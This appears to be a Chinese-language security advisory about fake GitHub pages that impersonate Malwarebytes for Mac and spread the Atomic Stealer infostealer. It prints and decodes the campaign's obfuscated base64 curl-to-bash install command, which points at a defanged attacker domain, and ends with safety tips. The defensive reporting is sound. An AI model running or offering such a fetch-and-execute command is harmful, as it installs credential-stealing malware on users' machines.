摘要:在这种情况下,网络犯罪分子的目标是传播信息窃取程序。他们不久前就发现,感染 Mac 电脑最简单的方法就是让用户自行安装恶意软件,而Atomic Stealer(又名 AMOS)正是 Mac 电脑的首选信息窃取程序。
目前,合法软件的假冒版本正在 GitHub 页面上流传,这是一场针对 Mac 用户的大规模攻击活动。
不幸的是,Malwarebytes for Mac 就是其中之一。
令人遗憾的是,冒充品牌的现象屡见不鲜,骗子们会利用知名品牌来锁定目标。这并不是什么新鲜事,但我们始终希望在发现此类事件时,务必提醒您。
在这种情况下,网络犯罪分子的目标是传播信息窃取程序。他们不久前就发现,感染 Mac 电脑最简单的方法就是让用户自行安装恶意软件,而Atomic Stealer(又名 AMOS)正是 Mac 电脑的首选信息窃取程序。
LastPass 威胁情报团队发布了有关此次攻击活动的信息,所有被冒充的软件都遵循类似的模式。有时,攻击的起点是谷歌赞助广告(我们之前说过我们不喜欢这种广告吗?哦,是的,我们说过!),这些广告指向的是 GitHub,而不是开发者的官方页面。
但在其他不太明显的情况下,您可能会看到如下搜索结果:
当我明确搜索“Malwarebytes Github macOS”时,这些内容才会出现在搜索结果的顶部,但众所周知,网络犯罪分子已经使用搜索引擎优化 (SEO) 技术来让他们的列表在搜索结果中排名更高。
这个想法是让有抱负的用户点击专用 GitHub 页面上的“获取恶意软件字节”按钮。
如果有人点击该按钮,他们就会进入一个下载页面,其中包含有关如何安装假冒产品的说明,而假冒产品实际上是一个信息窃取程序。
Malwarebytes for Mac 的终端安装说明指向最近注册的域名,但幸运的是我们的浏览器防护装置还是阻止了它。
以下是向访客提供的说明的技术细节:
/bin/bash -c ""在 macOS 或 Linux 上使用 Bash shell 运行命令。Bash 是 shell 命令的解释器。引号中的部分使用$( ... )。其中的所有内容都会首先执行;其输出成为外部命令的一部分。$(echo aHR0cHM6Ly9nb3NyZWVzdHIuY29tL2h1bi9pbnN0YWxsLnNo | base64 -d) echo ... | base64 -d解码长字符串。curl -fsSL 是从网络下载数据的命令。选项含义如下:-f:HTTP 错误静默失败。-s:静默模式(无进度条)。-S:如果使用 -s,则显示错误。-L:遵循重定向。所以,把所有这些放在一起:
内部命令变成:curl -fsSL https://gosreestr[.]com/hun/install.sh外部命令变为:/bin/bash -c "$(curl -fsSL https://gosreestr[.]com/hun/install.sh)"因此,完整的命令告诉系统直接从外部服务器下载脚本并立即使用 Bash 执行它。
这对用户来说在很多层面上都是危险的。由于没有提示或审核,用户在下载的脚本运行之前没有机会查看或评估其功能。由于使用了命令行,它可以绕过安全措施,绕过正常的文件下载保护,执行攻击者想要的任何操作。
ThreatDown和 Malwarebytes for Mac都能检测并阻止此 Atomic Stealer 变种及其他许多变种,但最好不要下载它。以下是一些关于如何确保安全的黄金准则:
切勿运行从随机页面或论坛复制粘贴的命令,即使它们位于看似合法的 GitHub 页面上,尤其不要使用涉及 curl ... | bash 或类似组合的命令。务必从官方开发者页面下载软件。如果他们没有提供下载链接,请与他们确认。避免使用赞助搜索结果。最好的情况是,它们会让你寻找的公司损失金钱;最坏的情况是,你会成为冒名顶替者的牺牲品。来源:Web3软件开发一点号
